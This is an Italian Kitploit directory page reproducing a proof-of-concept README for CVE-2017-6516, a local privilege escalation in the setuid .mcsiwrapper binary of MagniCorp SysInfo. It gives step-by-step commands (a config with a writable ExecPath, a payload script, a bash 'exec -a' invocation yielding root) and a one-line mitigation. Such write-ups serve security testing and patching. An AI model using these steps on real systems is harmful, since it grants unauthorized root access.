Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2017-6516-mcsiwrapper- — Un PoC / metodologia per sfruttare CVE-2017-6516 | Kitploit
Strumenti/GitHubGitHub/rubytox/cve-2017-6516-mcsiwrapper-
Escalation di PrivilegiAnalisi delle VulnerabilitàExploitPenetration TestingBinary Exploitation
GitHubrubytox/cve-2017-6516-mcsiwrapper-

CVE-2017-6516-mcsiwrapper-

Un PoC / metodologia per sfruttare CVE-2017-6516

Vedi Repository
4 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2017-6516

CVE-2017-6516 è una vulnerabilità di escalation dei privilegi che colpisce il binario .mcsiwrapper di MagniCorp SysInfo versione 10-H64. Quando questo binario ha il bit SUID impostato ed è obsoleto, un utente può eseguire codice arbitrario come il proprietario del binario - che spesso è root.

Requisiti

  • Il binario .mcsiwrapper deve essere setuid:
root@kitploit:~
$ ls -l .mcsiwrapper
-rwsr-xr-x 1 root root .mcsiwrapper
  • Il binario .mcsiwrapper deve essere sotto la versione 10-H64:
root@kitploit:~
$ .mcsiwrapper --version
<Version under 10-H64>

Sfruttamento

Crea un file config con il seguente contenuto:

root@kitploit:~
ExecPath=<Path to a writeable directory>

Crea un file eseguibile payload nella directory ExecPath, ad esempio:

root@kitploit:~
#!/bin/sh
whoami

E rendilo eseguibile:

root@kitploit:~
$ chmod +x payload

Esegui il comando:

root@kitploit:~
$ bash -c "exec -a payload .mcsiwrapper --configfile <path to config file>"
root

Mitigazioni

Aggiorna .mcsiwrapper almeno alla versione 10-H64.

Scarica lo strumento